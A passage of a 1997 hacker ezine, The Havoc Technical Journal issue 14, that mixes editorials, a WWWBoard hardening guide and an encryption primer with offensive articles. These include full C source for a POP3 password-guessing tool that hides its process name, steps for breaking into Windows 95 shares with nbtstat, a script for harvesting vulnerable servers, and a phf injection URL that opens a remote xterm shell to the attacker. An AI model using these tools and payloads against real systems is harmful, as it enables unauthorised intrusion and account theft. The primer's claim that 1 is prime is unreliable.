Copy Link
Add to Bookmark
Report
The Havoc Technical Journal 14
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Vol. 2 No. 2 The Havoc Technical Journal Issue 14³±
³ - http://www.thtj.com - ³±
³ September 1, 1997 - A Havoc Bell Systems Publication ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
úTHTJ - Writing text files like they're going outta styleú
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ú-=³THTJÄÄÄ[14]ÄÄÄÄContentsÄÄÄÄ[14]ÄÄÄTHTJ³=-ú
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Editorial..............................Scud-O
Spreading the knowledge................KungFuFox
Pop3.c mail port hacker................memor
Securing your WWWBoard.................Black Sol
Hacking Win95 With NBTSTAT.............W3|rd
More on cgi-bin holes..................]NiCK[
Encryption for dumbasses...............t33
More info on X.25 than the CIA has!....memor
Beyond HOPE review.....................AlienPhreak
Tatoo pager info and more..............memor
Help-a-phreak..........................THTJ
Oddville, THTJ.........................Scud-O
The News: HOPE, AOL Haxors, & SPAM!....KungFuFox
Logs...................................THTJ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ thtj.com is proud to now be hosting ³
³ global kOS - http://www.thtj.com/kOS/³
³ check it out. ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³The Havoc Technical Journal - contacts & information ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
- Editor in Chief : Scud-O, scud@thtj.com
- Assistant Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- thtj email address: thtj@thtj.com
- thtj website: http://www.thtj.com/
- thtj mailing address: PO BOX 448 Sykesville, MD 21784
The Havoc Technical Journal Vol. 2, No. 2, September 1st, 1997.
A Havoc Bell Systems Publication. Contents Copyright (©)
1997 Havoc Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or
in part without the expressed written consent of Havoc
Bell Systems Publishing. [No copying THTJ, damnit.]
The Havoc Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
For information about using articles published in THTJ, send mail to:
E-mail: thtj@thtj.com
US-mail: THTJ c/o HBS, PO Box 448, Sykesville, MD 21784
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Editorial by Scud-O ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I'm taking a break from writing an editorial this month because I've
been especially busy with THTJ for most of August, cya next month.
Scud-O
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of Havoc Bell Systems-
scud@thtj.com | http://www.thtj.com
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Spreading the knowledge - by KungFuFox ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
It's survived for 14 issues, the first 3 spoken of only in legend. It's
succeeded where others have failed. It's stood the test of time. It's past
its first birthday. Hooray for THTJ. A lot goes into making a publication
like this, and even more goes into putting it out on time. Funny how that's
not the norm in the world of ezines, coming out on time. I guess it's the
pressure of a deadline that's scared people away from the idea.
Taking a look at the booming industry of ezines out there, I can't help but
notice that not many of them make it very far. For whatever reason, they fall
below the horizon far sooner than they should. Maybe the initial motivation
to make the zine was no longer there, or maybe the editors didn't get enough
articles to keep publishing; something just didn't go right. They all started
off with the same goal, to bring information to the public. I think it's
noble that people are still out there trying to spread the knowledge, because
I think that's what ezines are for. They help the community by giving them
the knowledge that they would have a great deal of trouble getting otherwise.
As I reflect on the maturity of THTJ, on the changes it's gone through over
time, I do feel a good deal of pride in its success. From its early days of
paper form, through its evolution as an ezine, and to the present point, its
message has stayed the same; spread the knowledge. We spread the knowledge
every month, with the seemingly endless stream of articles that are sent in
from everyday people like you, from the community. We sure as hell couldn't
survive without the help of our reader/writers.
This zine has kept going because the idea of spreading the knowledge isn't
extinct, and hopefully it never will be. That's what freedom of speech is all
about, isn't it? Not about burning flags, or dressing in drag, or whatever.
It's about being able to exchange information without barriers, without
censors, without the challenge of fighting your allies to learn. If there
were no ezines, if nobody out there had the motivation to spread the
knowledge, if it was an every man for himself community, we'd be censoring
ourselves by holding the knowledge away from the people who want it, who can
use it.
Zines like Phrack and PLA have kept the scene informed, and laughing, for
the duration of this decade (and in the case of Phrack, for a good chunk of
the 80s as well). It is their success that has brought many a newbie into the
scene, just because of the openness and freedom of knowledge exchange that
these zines have promoted. Though 2600 is not an ezine, and not free, it
has kept the public informed for many years. It has also indirectly
influenced the ezine industry for some time now, forcing those who want the
knowledge to stay free to make their own ezines, and keep the knowledge
flowing.
Many a zine have come and gone, making maybe 1, maybe 2 issues. And of those
many, perhaps 1 in 20 of them makes a 3rd, and a 4th, and keeps the knowledge
flowing, but just 1 out of 20 is all it takes to keep the scene alive. There
are some newcomers out there, starting out like the many before them, and
they're continuing the tradition, taking over where others have left off.
Zines like System Failure, Zero, Ocean County Phone Punx, and Confidence
Remains High. They all show promise, and I'm sure there are many more like
them that I don't even know about. It can only be hoped that this trend of
knowledge spreading never ends, and should it ever, by the hand of some
contemptuous hypocrite, we'll not be the disgraced for trying.
The Havoc Technical Journal is going to continue to spread the knowledge for
as long as it can, but nothing lasts forever, and times do change. We're
aiming to better ourselves, to make this publication as informative, as
interesting, and as entertaining as possible. The opinions of our readers are
the best way for us to judge our strengths, our weaknesses, to determine what
it is we're doing right, and what it is we need to be doing. Flame us if
necessary, just let us know what you want to see, what you don't want to see
and what it is you see that you think is really swell. Operators are standing
by!
KungFuFox <mazer@cycat.com>
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Pop3.c mail port hacker - by memor ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
/*
A little pop3 "hacker" by memor
Sends a USER username and PASS username to a pop3 server on port 110
read from a passwd file on the target server. (I guess that passwd
file is shadowed and you are trying to gain access to some joe accounts)
Compile it with cc -o pop3 pop3.c
Usage: pop3 server-ip passwdfile port(optional)
Tested on linux 2.0.30
*/
/* Includes for File managing, String managing.. Default c commands, exit
commands, socket managing */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>
/* Defining Global variables */
/* Defining a socket, a string, 2 functions */
FILE *soc;
char *str;
int sock;
void answer();
void sending();
/* main routine */
int main(int argc, char *argv[])
{
/* defining a for the users counter, strr as a string for containing username,
port, count as file counter, structure for socket */
int a;
FILE *userfile;
char *strr;
char *ips;
int count, port = 110;
struct sockaddr_in ip;
/* space in the 3 strings.. */
str = (char *)malloc(100);
strr = (char *)malloc(100);
ips = (char *)malloc(100);
/* you need more arguments if you want it to work.. server port is not
needed cause pop is on port 110 */
if ( argc < 3 )
{
printf("Usage: %s (ip of pop3 server) (userfile) (server port)\n", argv[0]);
exit(1);
}
else
if ( argc > 2 )
{
if(argc > 3) port = atoi(argv[3]); /* if port argument defined */
userfile = fopen(argv[2],"r"); /* opening the userfile */
if(userfile == NULL ) /* is the userfile open? */
{
printf("Userfile doesnt exist..\n");
exit(1);
}
}
/* argv[1] -> ips.. so i'll nuke argv [1] and the others argv for hiding all of that now :) */
strcpy(ips,argv[1]);
/* now i hide all as some man using.. */
sprintf(argv[0],"man ");
sprintf(argv[1]," ");
sprintf(argv[2]," ");
if(argc>3) sprintf(argv[3]," ");
do /* lets begin a loop for userfile reading */
/* open a socket for connecting */
{
if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) /* i cant open it */
{
perror("socket");
exit(0); /* bye */
}
/* i need to read you as a file, miss socket */
soc=fdopen(sock, "r");
/* fill target address structur */
ip.sin_family = AF_INET;
ip.sin_port = htons(port);
ip.sin_addr.s_addr = inet_addr(ips);
bzero(&(ip.sin_zero),8);
/* counters are 0 now.. but in a few ? ;) */
a=0;
count=0;
do /* lets begin to get an username */
{
strr[count]=fgetc(userfile); /* i catch a caracter in the file */
if(strr[count]==':') /* is it a ':' ? */
{
strr[count]='\0';
a=1; /* it is a ':' so i'll forget to get the others caracters */
}
if(strr[count]==13) strr[count]='\0'; /* it is a 13? ok.. i forget it too */
strr[count+1]='\0'; /* i make my string */
count++; /* counting for filling strr */
}
while(strr[count-1]!=10 && strr[count-1]!=EOF); /* stop if we find the lf or end of file caracters */
if(strr[count-1]!=EOF && strlen(strr)>1) /* is my username > 1 caracter and am i not at the end of file ? */
{
if(strr[count-1]==10) strr[count-1]='\0'; /* if i see a lf, i kill it*/
printf("Username attempt: ->%s<-\n",strr); /* what is the username trying */
sprintf(str,"USER %s\n",strr); /* copy the USER name in str */
/* connect to the pop3 server */
if ( connect(sock, (struct sockaddr *)&ip, sizeof(struct sockaddr)) < 0 ) /* i cant connect it? */
{
perror("connect");
exit(1); /* bye bye .. :) */
} /* so i can connect it that mean if i am here.. */
else
{
/* server is talking.. */
printf("Server.. hello..\n");
answer(); /* please tell me what does the server says */
printf("%s",str); /* now i send that USER name*/
sending(); /* sending it.. */
printf("Server is answering...");
answer(); /* answer +OK from the server i guess */
sprintf(str,"PASS %s\n",strr); /* i'll send now that PASS name i first fill str with it*/
printf("%s",str); /* ok i am ready to send it */
sending(); /* sending it .. */
printf("Server is answering...");
answer(); /* i am receiving or a +ERR or a +OK i guess */
printf("Ok finish for that ROUND.. \n");
/* finished that round*/
close(sock); /* closing that socket */
}
}
}while(strr[count-1]!=EOF); /* im not at the end of file? so i continue */
}
/* sending string str */
void sending()
{
if ( send(sock, str, strlen(str), 0) < 0 ) /* can't i send str ? */
{
perror("send");
exit(1); /* i cant, so see you later */
}
}
/* receiving caracters from the server */
void answer()
{
/* first.. a caracter is a char type.. */
char ch;
do
{ /* begin receiving caracters */
ch=getc(soc);
printf("%c",ch); /* please tell me what the server says */
}
while(ch!='\r'); /* ok i received a 13.. i guess he wont talk anymore now.. i hope */
printf("\n");
}
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Securing your WWWBoard - by Black Sol ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Note: this is intended for those with their own websites;
and use Matts WWWBoard CGI Script (http://www.worldwidemart.com/scripts)
This is a perl script for a message board system, and as all programs,
carries bugs which can be easily exploited. If you have this perl script
running on your site, or plan on it, this text may be almost necessary for
its safety.
Well, more and more sites these days appear to have the WWWBoard script which
allows any person to post a message to your board, and let others read it.
This is considered a very convenient tool, but, as everything, has flaws and
can be exploited. The first part of this is the security issue brought up
with the associated WWWAdmin program that goes with WWWBoard, and second, an
issue of editing the PERL Script itself for better security.
WWWAdmin Hole: |
---------------+
The Exploit:
Used to remove messages from your board, WWWAdmin is used very commonly when
a person uses WWWBoard. The default file name is
/wwwboard_Directory/wwwadmin.cgi or www.admin.pl
You also must have a user name and password, which is stored in the
passwd.txt file. This can be a very big problem. The method WWWAdmin uses to
encrypt the password is the same as normal unix passwords, so therefore,
password crackers, like CrackerJack or John the Ripper can be used to crack
it.
The way it is displayed is this:
WebAdmin:aepTOqxOi4i8U
WebAdmin is the username and aepTOqxOi4i8U is the encrypted password. If you
put this into unix format, lets say..
WebAdmin:aepTOqxOi4i8U:275:15:Emmanuel Goldstein:/usr/homos/egold:/bin/csh
and then, used sturdy old John the Ripper to crack it, you'd come up with the
password WebBoard. Then, you'd just have to go to lets say
www.host.com/wwwboard/wwwadmin.cgi or wwwadmin.pl and use WebAdmin and
WebBoard as the password, and you can edit and delete all their stuff..
How to Fix it:
Don't panic because you might get hacked by some ego-maniac kid hacker who
doesn't have anything better to do then ruin other peoples fun, this can be
easily fixed. There are several methods, i suggest using all of them for
maximum security.
Method #1 - Don't use the standard wwwadmin.pl or wwwadmin.cgi for the name.
Use some random numbers and letters when uploading this to your server, for
instance, make it wadawambrblah.cgi. This way, only you will even know where
the admin script is, so even if they get the password they won't know where
to go!
Method #2 - Don't use the standard passwd.txt for the passwd file. Change it
also to something random like sdihff.bla - NOTE - you must also make this
change in the WWWAdmin script, under the location for your passwd file. More
details in the WWWAdmin readme file..
Method #3 - As soon as you upload it, IMMEDIATLY change the username and
password! And do not use common words, most words can be found in wordlists,
which basically means, you can still get hacked..use random names, like
ajgndnbvfd for the password, etc. etc., you get the point (i hope). Make it
LONG and use numbers as well, like a4mg4msdfsd9as9.
Note - be sure to keep your passwords written down, so you can remember them!
Method #4 - When you change your password, make sure it is more then 8
letters+numbers. Password crackers crack up to 8 characters, so, if your
password is longer then that, and someone gets your password file; they can
only crack the first 8 letters/numbers, and they can't get the rest of the
password.
Method #5 - Modify your PERL script so only ip's from your ISP (internet
service provider) can access the wwwadmin script, whatsoever. Note - more on
this below!
Method #6 - Chmod your passwd text file and even wwwadmin cgi script so that
nobody can access it, and then when you need to use it, you can chmod it back
to world readable/executable.
For example, log in to your shell, and then do the following:
-+-
cd wwwboard (wwwboard being the name of the dir everything is in)
chmod o-rwx passwd.txt (passwd.txt being the name of the passwd file for
wwwadmin)
chmod o-x wwwadmin.cgi (wwwadmin.cgi being the name of the wwwadmin script
file)
-+-
That's all. now if someone tries to access your WWWAdmin or your password
file, they will get a Forbidden Access error. However, so will you. So, when
you want to use your wwwadmin script, go back to your shell and do this:
-+-
cd wwwboard
chmod o+rwx passwd.txt
chmod o+x wwwadmin.cgi
-+-
Its as simple as that.
Modifying the PERL Script for more security: |
----------------------------------------------+
In most situations, people using WWWBoard do not know PERL, the programming
language that it is written in. Knowing PERL can benefit you greatly. What
are some things you could do if you knew how to edit the perl script?
1) Ban certain people from using your board
2) Ban all people from a certain internet provider from using your board
3) Stop other people from using your nickname/handle
4) Record the IP, Internet Address, Web Browser, time and date, and the
message that person posted; to a file each time somebody posts.
5) Change the background colors, background appearance, and the general
appearence, and layout of the board to YOUR liking.
6) Display information such as a persons IP and web browser in their post.
7) Require a username and password to make posts.
8) Stop other people from accessing your WWWAdmin script.
Unfortunately, to describe how to actually DO those things it'd take another
text in itself :) You can check out this site for some pointers with perl:
http://www.ora.com/catalog/pperl2/excerpt/ch01-01.htm
Until then, I can include one method you can use. It is pretty easy to
include somebodies IP or host in a post. Start off with these two lines, in
the top, with the other variables:
# Start perl sample
$host = $ENV{'REMOTE_HOST'};
$ip = $ENV{'REMOTE_ADDR'};
# End perl sample
Those two lines will put the persons IP and host into two little variables.
Now, in the procedure where it writes to the html file, you can include those
two variables to display the poster's info. The procedure to put this into is
new_file If your unsure of where to put this, just look for a print NEWFILE
"blah blah\n"; statement..you can look for where it says something like
"posted by $name" or whatever, and you can just add $host or $ip into the
line somewhere.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Hacking Win95 With NBTSTAT - by W3|rd ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Requirements for the hack to work:
Windows 95 & the Victim must run NETBIOS and have "sharing" on their hard
drives.
First type 'nbtstat -A x.x.x.x'
If your lucky you'll get something like this.
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
^M0REBID <00> UNIQUE Registered
VIRTUAL COMPUTE<00> GROUP Registered
^M0REBID <03> UNIQUE Registered
MAC Address = 44-45-53-54-00-00
Remember the first UNIQUE name here.
Now create 'lmhosts' in your windows dir.
it should look like this:
x.x.x.x ^M0REBID
Then you purge nbtstat like this: 'nbtstat -r'
Then goto Find -> Computers
on the Start Menu in Windows 95.
Type in the UNIQUE name and search.
Then if found , double click on the name , and if you get up a window with
for example C and D .. you will have Access to his harddrives.. ;)
You may now read his/her files ... and remember be creative... ;)
(But remember , some people might have sharing on..but with pwd!)
Mission Accomplished...
Thankz to: iO and ^D-BL00D^ (my Co-prez in NHF)
W3|rd - Prez. of Norwegian Hacker Force, and a Rebel X Hacker.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ More on cgi-bin holes - by ]NiCK[ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
1 - The largest server database helps exploit phf
*************************************************
I have appointed: ALTA-VISTA ! :) yeah ! if you know the syntax of
this websearch well enough, you can succeed to have a list of more
than 3000 insecure servers with this method, simply by typing:
http://altavista.digital.com/cgi-bin/query?pg=aq&what=web&fmt=.
&q=link%3A%22%2Fcgi-bin%2Fphf%22&r=&d0=&d1=
(type this all in on one line)
Too easy! Isn't it? Also, you can modify it to search for php.cgi,
webgais, or others such as view-source...
Note: Sometimes, some servers won't work... but its just because the
database isn't updated every day.
2 - Other stuff to exploit websearchs
*************************************
I love the "Yellow Pages" of organizations, enterprises, or companies
like for instance Adminnet (www.adminet.com)... its filled with kewl
insecure web servers.. But the problem is that it's not very
interesting to scan manually... So, I wrote a little program to change
the html index of web servers into a list of exploitable servers for
phfscan or phpscan...
Here is a little unix script:
--
if [ $# = 0 ]
then
echo "Usage: html2list file.html" >&2
exit 1
cat $1 | grep '"http://' | tr '"' '\n' | grep '^http://' | cut -c8- |tr '/'
'\n' |grep '\.' | grep -vi '\.html\|\.htm' |sort -u > $1.list
(one again, the last 2 lines need to be moved up together)
--
Note: You can change/update it to a better way of scanning...
3 - Xterm with phf
******************
Cracking the /etc/passwd ! ok... but there are better things to do
than waste your time. This attack consists of using Xterm with phf.
So, of course Xwindows must be present on the victim server, and you
must also be running it. While in Xwindows, write this: 'xhost
+www.victim.com' This is so your machine will accept connections
from victim.com... You can simply type 'xhost +', but it isn't really
secure... After, you must know what os www.victim.com is running,
so you can guess the path of Xterm.
Here are some default Xterm paths for a few systems:
AIX : /usr/bin/X11/xterm
HP-UX: /usr/bin/X11/hpterm
Linux: /usr/X11R6/bin/xterm
SunOS: /usr/openwin/bin/xterm
You can also use: 'find /usr -name xterm' or again 'whereis xterm' if
you have a shell on the machine.
Finally, once you have found the path, you can run xterm via phf like:
http://www.victim.com/cgi-bin/phf?Qname=a%0a/usr/openwin/bin/
xterm%20-display%20your.ip.com:0 (combine these two lines)
Wait a few seconds... and whoop, a shell from the victims server will
appear in your Xwindow. :) Usually you become an user Nobody, but
sometimes, if the http daemon runs in a root shell, your become root,
or www sometimes.. The best thing is that your access is not logged
in the lastlog or wtmp... Very clean exploit !
Have PHFun ! :)
-]NiCK[ <Modul1@usa.net>
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Encryption for dumbasses - by t33 ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
This article is intended for the people who know shit about encryption and
want a little more info about it.
Hope it is useful.
Contents:
1) What is Encryption?
2) How does Encryption work?
3) Brute Force Attack
4) Factoring Techniques
5) How Long Should a Key be?
6) Mounting an Attack
7) What is RSA?
8) What is DES?
9) What us Substitution?
10) What is Permutation?
1) What is Encryption?
Encryption is simply the encoding of messages so that they cannot be read by
anyone who does not know how to decipher it. Governments and militaries have
been using codes to make their messages unreadable for many years. For
example, Caesar used a code to send military messages that was simply a shift
of the letters in the message three spaces down in the alphabet (an A becomes
a D). In cryptographic language this is known as a shift cypher.
The properties of a good cryptosystem are analogous to that of a normal lock.
A good system will have a very large key which is one of a large number of
keys (termed keyspace). It will also provide cyphertext (encrypted plaintext)
that appears random and stands up to known decryption attacks. Lastly, the
system should be suitable to the function for which it is intended. For
example, if a message is to remain secret for ten years or more, then the
system should take into account the future speed of computers and their
corresponding ability to attack the system. However, except for classified
government information (and maybe the Coca-Cola secret recipe), the reality
is that the relevance of most corporate information traveling over networks
is measured in days or weeks, and not decades.
2) How Does Encryption Work?
Most encryption algorithms are based on the concept of complex mathematics
that work in only one direction and are generally based on the difficulty of
factoring very large numbers (keys) that are used for the encryption. These
large numbers are the product of large prime numbers. For example, anyone can
multiply two large prime numbers to obtain a result, but it is very difficult
for someone else to factor the large number to get back the two primes. This
is to say that mathematicians have yet to figure out a method for reversing
the math effectively. In this way, cryptography has been a secure method of
ensuring data confidentiality over computer networks.
3) Brute Force Attack
The traditional method of breaking complex mathematical codes is through
brute-force attacks. This method is mathematically the easiest to perform,
but relies on vast computer processing power and is therefore the easiest to
defend against. A brute force attack tries every possible combination of keys
in order to unlock the encryption. Therefore, simply increasing the keyspace
will increase the amount of time needed to mount a brute force attack. The
reality is that a brute force attack is not a method which will ever be used
to decode cyphertext. Some quick calculations relating computer speeds and
key length will yield code-breaking times that exceed the expected life of
the universe.
The brute force method needs a sample of unencrypted text for the computer to
compare each decryption attempt with the actual text. This can be easily
obtained by knowing the nature of the messages being intercepted. For
example, all Microsoft word files will have a set of standard information
(bytes). How the decryption functions is easy. A key that is 128 bits long
will have 2128 possible values. Therefore, assuming that a very fast computer
that can try one million keys per second (consider that attempting a key
requires many instructions) it will take 225 years to try all of the
combinations with a 50% probability that it will be found in the first 224
years (remember that the universe is estimated to be 210 years old). (Bruce
Schneier, Applied Cryptography c.1995).
4) Factoring Techniques
The more feasible form of attack will come from mathematicians refining
existing and developing new factoring techniques. These methods have been
used to show potential vulnerabilities in key-based encryption. However, they
still require massive computer power and long time-frames to break the
encryption. For example, a 129-digit number was factored at Bellcore labs in
1994. This used the idle time on 1600 computers around the world, over a
period of 8 months using a computation called the quadratic sieve. The
authors estimated that they used .03% of the computing power of the Internet,
and believed that, with a highly publicized event, they could acquire 100,000
computers (approx. 2% of the Internet) without resorting to illegal or
unethical efforts such as an Internet worm.
5) How Long Should a Key be?
The security of a cryptosystem depends on the strength of the algorithm and
the length of the key. The strength of the algorithm is difficult to
understand. However, understanding the methods of how the keys are decrypted
provides some clues as to it's strength. Knowing that all numbers can be
represented by a set of primes, encryption techniques rely on the difficulty
of factoring very large numbers into their respective primes. Lets look at a
very simplified example (cryptologists will undoubtedly cringe at the over
simplification):
Suppose we have number n represented by x and y such that n = xy. The
quadratic sieve method works by first assuming that the numbers x and y are
close to one another on a number line. Successive steps either prove or
disprove this and search out the next numbers. Therefore, effective
encryption will create keys which are not close to one another. However, the
numbers cannot be so far apart as to have the one of x or y set to a very
small value. Effective encryption-based key generation will generate the keys
randomly, but also discard those keys which will be susceptible to
factor-based decryption systems.
What is involved in factoring a number? Anyone with a grade six education (or
a calculator) can easily multiply together two numbers. Anyone with a grade 9
education (and who remembers it) can factor a small number into its primes. A
prime number is any integer which is only divisible by itself and by 1. For
example, the sequence of the first seven prime numbers is: 1,2,3,5,7,11,13...
Lets say we express the number 24 as a set of its primes. This is simply
2*2*2*3 = 24. Seems simple enough. Now, for those of you who think this is
easy, try entering the RSA factoring challenge and they will award you a
prize if you can do it on very large numbers (see the link at the end of this
document).
Another method called the general number field sieve can factor numbers
approximately 10 times faster than the quadratic field sieve, but is only
faster for larger numbers (greater than 110 digits). This method hasn't been
refined to the degree of the quadratic sieve but, with time will likely be
the method of choice for factoring large keys.
Factoring large numbers is very hard, but is becoming easier therefore
predictions based on security required for long term encryption cannot be
made. However, most people don't require their data to remain secure for 100
years. For example, information about stock market conditions may only be
relevant for a few days. Decisions based on that information need only be
protected for a few hours. At the end of the day everyone's trades become
known anyway. For a manufacturer, design specs. need only be kept secret
until product launch. For the longest-term secrets, such as military secrets,
key length should be based on the computing speeds at that time and the
projected future increases. Two general rules of thumb is that computing
power increases by a factor of 10 every five years and it is always best to
be cautious when making predictions.
6) Mounting an Attack
With respect to computing methods, a hardware or a software based attack can
be mounted. Hardware designers and cryptologists have designed machines
specifically for breaking codes which can greatly increase the rate at which
a code is broken. This involves hundreds of parallel processors working on
different 'parts' of the key.
A software-based attack is much slower but is also much cheaper to mount. For
example, using an algorithm with a 56 bit key, a software attempt run on 512
workstations capable of running the algorithm at a rate of 15,000 encryptions
per second, running 24 hours per day would require 545 years to test all
possible numbers (Bruce Schneier, Applied Cryptography c.1995) . Importantly,
with a 40 bit key (the only key length currently allowed for export under
federal legislation) a similar network would take just under two days to
complete the attack.
A 128 key makes brute force cryptanalysis effectively useless, even when
factoring estimates for increases in the number of networked computers in the
world and increasing processor speed. However, it is still susceptible to
factoring methods when distributed among several computers. The next logical
question is, why not use keys with a very large number of bits (>2000)? The
answer lies in the tradeoff between security and usability. The longer the
